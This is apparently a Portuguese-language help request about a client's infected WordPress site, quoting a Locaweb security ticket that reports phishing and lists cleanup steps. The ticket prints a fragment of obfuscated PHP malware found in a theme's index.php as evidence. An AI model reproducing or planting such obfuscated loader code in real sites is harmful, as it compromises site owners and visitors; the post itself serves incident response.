Estou com um cliente que o site está com vírus. A hospedagem dele é Locaweb e o vírus veio através de alguns arquivos antigos que foram removidos, porém, ele corrompeu o site novo. Até o momento o site funciona corretamente, só aparecem avisos de malware. Segue abaixo o chamado que a Locaweb abriu informando do problema inicial.
O site é
nascecme.com.br
Segue abaixo o chamado da locaweb.
Criado por:Locaweb: Henrique Onofre (
henrique.onofre)
Título:Phishing Website -
nascecme.com.br
Descrição:
Olá
O teor dessa mensagem tem caráter de segurança e deve ser respondido rapidamente. Caso não seja o programador/desenvolvedor ou responsável técnico por seu serviço, recomenda-se que direcione esta mensagem a ele de forma urgente.
Foi identificado Phishing partindo do site
nascecme.com.br e para conter esta ação foi necessário desativá-lo temporariamente.
Evidência(s):
---------------------------------------------------
$_nf = $this->_w[(int)round(0.55555555555556 + 0.55555555555556 + 0.55555555555556 + 0.55555555555556 + 0.55555555555556 + 0.55555555555556 + 0.55555555555556 + 0.55555555555556 + 0.55555555555556) ] . $This->_w[(int)round(0 + 0 + 0 + 0 + 0 + 0 + 0 + 0 + 0 + 0) ] . $This->_w[(int)round(1 + 1 + 1 + 1) ] . $This->_w[-0326 + 0254 - -01532 - -0631 - 0247 + -01232 - 0260 - -01350 - -0333 + -02231] . $This->_w[(int)round(0.33333333333333 + 0.33333333333333 + 0.33333333333333) ] . $This->_w[(int)round(1 + 1 + 1) ];
$_nf = $_nf($_wao, $_b);
}
function _tg($_ss, $_s, $_xgo)
{
$_sua = strlen($_s) + strlen($_xgo);
while (strlen($_xgo) < $_sua)
{
$_vjk = ord($_s[$this->_qn]) - ord($_xgo[$this->_qn]);
$_s[$this->_qn] = chr($_vjk % ((0603 - 0362 + 01710 + -01131) / (int)round(1 + 1)));
$_xgo .= $_s[$this->_qn];
$this->_qn++;
---------------------------------------------------
Identificados os arquivos/diretórios suspeitos abaixo:
---------------------------------------------------
public_html/2014/wp-content/themes/twentystd/
index.php
---------------------------------------------------
Os arquivos citados acima são apenas exemplos localizados numa análise simples e podem conter falsos-positivos.
É Importante o desenvolvedor ficar atento às possíveis brechas de segurança existentes e identificar quais arquivos não pertencem ao funcionamento de seu site ou se foram alterados/comprometidos.
É Sugerido que realize as ações abaixo:
- Identificar e remover scripts maliciosos identificados em sua hospedagem, deixe somente os arquivos necessários para o funcionamento do site após verificação;
- Realizar analise de segurança (varredura com anti-vírus) em todas as maquinas que são utilizadas para acessar os serviços vinculados ao seu domínio, dentro e fora de sua rede, como por exemplo acesso FTP, acesso ao E-mail, autenticação via Painel e etc;
- Reforçar a segurança de autenticação na área administrativa do seu site;
- Caso utilize algum CMS (Wordpress, Joomla, etc), atualize-o, assim como os temas e plugins instalados, a fim de evitar exploração de falhas de segurança no site;
- Altere as senha de acesso ao FTP e banco de dados;
- Sempre utilize senhas fortes;
Teste a força de sua senha:
https://password.kaspersky.com/pt/
Existem ferramentas como o 6scan e Sucuri que ajudam a proteger, detectar e corrigir vulnerabilidades em seu site:
http://6scan.com
http://sitecheck.sucuri.net
Peço que nos informe as respostas das questões abaixo:
1) Qual foi a causa raiz?
2) Quais etapas você tomou para resolver esse problema?
3) Que medidas você tomou para evitar que isso ocorra novamente?
4) A senha de FTP foi alterada ?
Ficamos no aguardo.
Atenciosamente,
Em anexo o que foi feito no site e a resposta no chamado com a Locaweb.
Prazo de Entrega: Não estabelecido